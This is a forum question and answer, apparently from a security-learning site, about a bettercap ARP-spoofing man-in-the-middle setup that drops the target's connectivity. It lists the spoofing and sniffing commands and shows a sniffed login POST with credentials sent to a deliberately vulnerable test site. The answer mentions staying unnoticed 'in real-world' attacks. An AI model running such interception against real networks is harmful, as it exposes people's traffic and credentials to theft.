0

When I try to use the module to intercept data to vulnweb, the target machine loses connectivity to the internet. Sometimes I am able to intercept the data but it looks like my terminal is stuck in an endless loop where I do intercept the data but the form is not sent successfully to the server.

I get this in an endless loop on bettercap terminal

"POST /login HTTP/1.1
Host: testhtml5.vulnweb.com
Upgrade-Insecure-Requests: 1
Origin: http://testhtml5.vulnweb.com
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Content-Length: 30
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://testhtml5.vulnweb.com/
Accept-Encoding: gzip, deflate
Accept-Language: he-IL,he;q=0.9,en-US;q=0.8,en;q=0.7
 
username=admin&password=123456
"

and also I get endless loops of

.17  » [04:38:02] [net.sniff.http.request] http DESKTOP GET testhtml5.vulnweb.com/

In the end, all I see on the target side is

"this site can't be reached, ERR_Connection_RESET"

some sites get an error

"NO internet error : DNS_PROBE_FINISHED_NO_INTERNET"

commands I run are:

net.probe on
set arp.spoof.fullduplex on
set arp.spoof.targets 10.0.0.15(target ip)
net.sniff on
arp.spoof on

When I try to send the form on vulnweb= endless loop and the internet on the target site get stuck.

I have Alfa AWUSAlfa AWUS036ACH

Any Ideas?

1 Answer 1

0

Have you tried to clear up the website cache. That's what my instructor said, but it doesn't make sense because if this is in real-world, you can't ask your target to clear his/hers cache, because that might be suspicious.

0

You must log in to answer this question.

Not the answer you're looking for? Browse other questions tagged .